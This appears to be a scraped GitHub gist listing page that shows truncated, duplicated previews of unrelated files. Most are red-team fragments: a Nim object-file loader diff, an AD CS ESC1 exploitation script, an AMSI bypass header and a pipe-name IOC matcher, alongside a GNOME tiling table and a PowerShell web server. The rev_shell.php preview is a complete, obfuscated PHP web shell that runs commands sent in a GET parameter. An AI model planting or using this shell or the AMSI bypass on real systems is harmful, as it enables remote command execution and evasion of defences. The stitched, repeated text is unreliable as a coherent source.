Nate Subra natesubra

## caveman-bof.diff
diff --git a/Main.nim b/Main.nim
index ef19f4c..c133586 100644
--- a/Main.nim
+++ b/Main.nim
@@ -128,7 +128,7 @@ proc ApplyGeneralRelocations(patchAddress:uint64,sectionStartAddress:uint64,give
             echo "[!] No code for type: ",givenType

 var allocatedMemory:LPVOID = nil
-
+var caveLibH: HANDLE

## rwxscan.nim
import winim
import std/strutils, os

proc lpwstrc(bytes: array[MAX_PATH, WCHAR]): string =
  result = newString(bytes.len)
  for i in bytes:
    result &= cast[char](i)
  result = strip(result, chars = {cast[char](0)})

var pages = newSeq[int](0)

## tiling-extensions-for-gnome.md

      
              1 file
            
          
              4 forks
            
          
              1 comment
            
          
              12 stars
            
          
                bmaupin
                / tiling-extensions-for-gnome.md
            
            
              Last active
              May 6, 2024 22:13
            
              
                Tiling extensions for Gnome
              
          
    Goal: find a Linux alternative to FancyZones for Windows


Name
Recommended
Type
Supports main colum
Supports layouts
Multiple windows in same tile
Windows can span multiple zones
Notes


gSnap
👍👍
Gnome extension
yes
yes
yes
yes
Can be configured almost just like FancyZones; in the settings: disable Show tabs
enable Hold CTRL to snap windows


gTile

Gnome extension


no?


Tiling Assistant
👍
Gnome extension
yes
yes
yes
yes
Layout support is "experimental" and the UX is a bit unintuitive; after enabling layouts, you have to click the star icon beside a layout to mark it as a favourite before you can then hold Alt while dragging


## esc1.ps1
#Thank you @NotMedic for troubleshooting/validating stuff!

$password = Read-Host -Prompt "Enter Password"
#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time!

$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now.
$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored?
$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box.
$CASERVER = "alexlab-dc01-ca" #CA name.
$CA = $CAFQDN + "\" + $CASERVER

## rev_shell.php
<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;

/*
 *   In terminal:
 *       $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
 *   This is how the code will be produced, \xa0\xb8\xba\xab will be
 *   treated as constant therefore no " needed. It is also not copyable
 *   string because of non-ascii characters
 *
 *   Explanation:

## DotNet4Console.csproj
<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net40</TargetFramework>
  </PropertyGroup>
  <ItemGroup>
    <PackageReference Include="Microsoft.NETFramework.ReferenceAssemblies.net40" Version="1.0.2">
      <PrivateAssets>all</PrivateAssets>
      <IncludeAssets>runtime; build; native; contentfiles; analyzers; buildtransitive</IncludeAssets>
    </PackageReference>

## patchless_amsi.h
#ifndef PATCHLESS_AMSI_H
#define PATCHLESS_AMSI_H

#include <windows.h>

static const int AMSI_RESULT_CLEAN = 0;

PVOID g_amsiScanBufferPtr = nullptr;

unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) {

## iocpipe.py
import re, sys

def rule_startswith(ioc_string):
	def __match(pipename):
		if pipename.startswith(ioc_string):
			print("\tMATCH startswith({})".format(ioc_string))
			return True
		return False
	return __match

## AMSITools.psm1
filter Send-AmsiContent {
<#
.SYNOPSIS

Supplies the AmsiScanBuffer function with a buffer to be scanned by an AMSI provider.

Author: Matt Graeber
Company: Red Canary

.DESCRIPTION

## powershell-web-server.ps1
# This is a super **SIMPLE** example of how to create a very basic powershell webserver
# 2019-05-18 UPDATE — Created by me and and evalued by @jakobii and the comunity.

# Http Server
$http = [System.Net.HttpListener]::new()

# Hostname and port to listen on
$http.Prefixes.Add("http://localhost:8080/")

# Start the Http Server
	diff --git a/Main.nim b/Main.nim
	index ef19f4c..c133586 100644
	--- a/Main.nim
	+++ b/Main.nim
	@@ -128,7 +128,7 @@ proc ApplyGeneralRelocations(patchAddress:uint64,sectionStartAddress:uint64,give
	echo "[!] No code for type: ",givenType

	var allocatedMemory:LPVOID = nil
	-
	+var caveLibH: HANDLE
	import winim
	import std/strutils, os

	proc lpwstrc(bytes: array[MAX_PATH, WCHAR]): string =
	result = newString(bytes.len)
	for i in bytes:
	result &= cast[char](i)
	result = strip(result, chars = {cast[char](0)})

	var pages = newSeq[int](0)
Name	Recommended	Type	Supports main colum	Supports layouts	Multiple windows in same tile	Windows can span multiple zones	Notes
gSnap	👍👍	Gnome extension	yes	yes	yes	yes	Can be configured almost just like FancyZones; in the settings: disable Show tabs enable Hold CTRL to snap windows
gTile		Gnome extension			no?
Tiling Assistant	👍	Gnome extension	yes	yes	yes	yes	Layout support is "experimental" and the UX is a bit unintuitive; after enabling layouts, you have to click the star icon beside a layout to mark it as a favourite before you can then hold Alt while dragging
	#Thank you @NotMedic for troubleshooting/validating stuff!

	$password = Read-Host -Prompt "Enter Password"
	#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time!

	$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now.
	$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored?
	$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box.
	$CASERVER = "alexlab-dc01-ca" #CA name.
	$CA = $CAFQDN + "\" + $CASERVER
	<?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`;

	/*
	* In terminal:
	* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
	* This is how the code will be produced, \xa0\xb8\xba\xab will be
	* treated as constant therefore no " needed. It is also not copyable
	* string because of non-ascii characters
	*
	* Explanation:
	<Project Sdk="Microsoft.NET.Sdk">
	<PropertyGroup>
	<OutputType>Exe</OutputType>
	<TargetFramework>net40</TargetFramework>
	</PropertyGroup>
	<ItemGroup>
	<PackageReference Include="Microsoft.NETFramework.ReferenceAssemblies.net40" Version="1.0.2">
	<PrivateAssets>all</PrivateAssets>
	<IncludeAssets>runtime; build; native; contentfiles; analyzers; buildtransitive</IncludeAssets>
	</PackageReference>
	#ifndef PATCHLESS_AMSI_H
	#define PATCHLESS_AMSI_H

	#include <windows.h>

	static const int AMSI_RESULT_CLEAN = 0;

	PVOID g_amsiScanBufferPtr = nullptr;

	unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) {
	import re, sys

	def rule_startswith(ioc_string):
	def __match(pipename):
	if pipename.startswith(ioc_string):
	print("\tMATCH startswith({})".format(ioc_string))
	return True
	return False
	return __match
	filter Send-AmsiContent {
	<#
	.SYNOPSIS

	Supplies the AmsiScanBuffer function with a buffer to be scanned by an AMSI provider.

	Author: Matt Graeber
	Company: Red Canary

	.DESCRIPTION
	# This is a super SIMPLE example of how to create a very basic powershell webserver
	# 2019-05-18 UPDATE — Created by me and and evalued by @jakobii and the comunity.

	# Http Server
	$http = [System.Net.HttpListener]::new()

	# Hostname and port to listen on
	$http.Prefixes.Add("http://localhost:8080/")

	# Start the Http Server